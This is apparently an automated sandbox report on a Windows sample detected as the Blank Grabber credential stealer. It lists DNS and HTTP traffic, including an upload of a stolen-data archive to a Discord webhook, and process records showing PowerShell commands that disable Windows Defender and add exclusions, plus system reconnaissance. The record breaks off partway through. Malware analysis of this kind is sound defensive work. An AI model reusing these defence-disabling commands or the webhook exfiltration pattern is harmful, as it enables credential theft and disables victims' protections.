KERNEL32.dll | IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                    Dec 6, 2023 09:24:38.846661091 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:38.856576920 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:38.950968981 CET8049742208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.951044083 CET4974280192.168.2.4208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2023 09:24:05.078068018 CET | 61390 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2023 09:24:05.175081968 CET | 53 | 61390 | 1.1.1.1 | 192.168.2.4
Dec 6, 2023 09:24:06.490470886 CET | 60299 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2023 09:24:06.585920095 CET | 53 | 60299 | 1.1.1.1 | 192.168.2.4
Dec 6, 2023 09:24:37.245526075 CET | 62052 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2023 09:24:37.340899944 CET | 53 | 62052 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2023 09:24:05.078068018 CET | 192.168.2.4 | 1.1.1.1 | 0xd89d | Standard query (0) | blank-kwj1y.in | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:06.490470886 CET | 192.168.2.4 | 1.1.1.1 | 0xe1dc | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.245526075 CET | 192.168.2.4 | 1.1.1.1 | 0x3734 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2023 09:24:05.175081968 CET | 1.1.1.1 | 192.168.2.4 | 0xd89d | Name error (3) | blank-kwj1y.in | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:06.585920095 CET | 1.1.1.1 | 192.168.2.4 | 0xe1dc | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.340899944 CET | 1.1.1.1 | 192.168.2.4 | 0x3734 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.340899944 CET | 1.1.1.1 | 192.168.2.4 | 0x3734 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.340899944 CET | 1.1.1.1 | 192.168.2.4 | 0x3734 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.340899944 CET | 1.1.1.1 | 192.168.2.4 | 0x3734 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Dec 6, 2023 09:24:37.340899944 CET | 1.1.1.1 | 192.168.2.4 | 0x3734 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                    • discord.com
                                                                                                                                                                    • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 208.95.112.1 | 80 | 7484 | C:\Users\user\Desktop\mei.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2023 09:24:06.691800117 CET | 171 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
Dec 6, 2023 09:24:06.788235903 CET | 229 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Wed, 06 Dec 2023 08:24:06 GMT
                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                    Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 208.95.112.1 | 80 | 7484 | C:\Users\user\Desktop\mei.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2023 09:24:36.472079039 CET | 170 | OUT | GET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
Dec 6, 2023 09:24:36.935125113 CET | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Date: Wed, 06 Dec 2023 08:24:36 GMT
                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                    Content-Length: 177
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 30
                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 22 7d
                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"District of Columbia","timezone":"America/New_York","reverse":"","mobile":false,"proxy":true,"query":"102.165.48.83"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 162.159.136.232 | 443 | 7484 | C:\Users\user\Desktop\mei.exe
Timestamp | Bytes transferred | Direction | Data
2023-12-06 08:24:37 UTC | 302 | OUT | POST /api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC HTTP/1.1
                                                                                                                                                                    Host: discord.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    Content-Length: 696433
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=e3d1360ad0622e034bb000d4c8b44246
2023-12-06 08:24:37 UTC | 16384 | OUT | first 16 KiB chunk of the multipart body (raw hex omitted)
Data Ascii:
--e3d1360ad0622e034bb000d4c8b44246
Content-Disposition: form-data; name="file"; filename="Blank-user.rar"
Content-Type: application/octet-stream

Rar! (binary RAR archive body follows)



                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:09:24:00
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Imagebase:0x7ff6313d0000
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5 hash:B5479BF5C97CFA81C02676BB9335AB24
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1656841633.000001FFF1DDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1656841633.000001FFF1DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:09:24:01
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    Imagebase:0x7ff6313d0000
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5 hash:B5479BF5C97CFA81C02676BB9335AB24
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2033404601.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2024331712.000002E915056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2025311292.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2027450507.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2028624518.000002E914078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:09:24:04
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                    Imagebase:0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high
Has exited: true

Target ID: 10
Start time: 09:24:04
Start date: 06/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase: 0x7ff784dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 09:24:04
Start date: 06/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 09:24:04
Start date: 06/12/2023
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff6bfe40000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 13
Start time: 09:24:04
Start date: 06/12/2023
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic csproduct get uuid
Imagebase: 0x7ff7cbec0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 09:24:06
Start date: 06/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase: 0x7ff784dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 09:24:06
Start date: 06/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 09:24:06
Start date: 06/12/2023
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase: 0x7ff74dbf0000
File size: 77'312 bytes
MD5 hash: 227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 09:24:06
Start date: 06/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase: 0x7ff784dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 09:24:07
Start date: 06/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 09:24:07
Start date: 06/12/2023
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase: 0x7ff74dbf0000
File size: 77'312 bytes
MD5 hash: 227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 09:24:07
Start date: 06/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff784dd0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 09:24:07
Start date: 06/12/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 09:24:07
Start date: 06/12/2023
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: wmic path win32_VideoController get name
Imagebase: 0x7ff7cbec0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 09:24:08
Start date: 06/12/2023
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase: 0x7ff7699e0000
File size: 289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:09:24:08
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:09:24:09
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:09:24:10
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
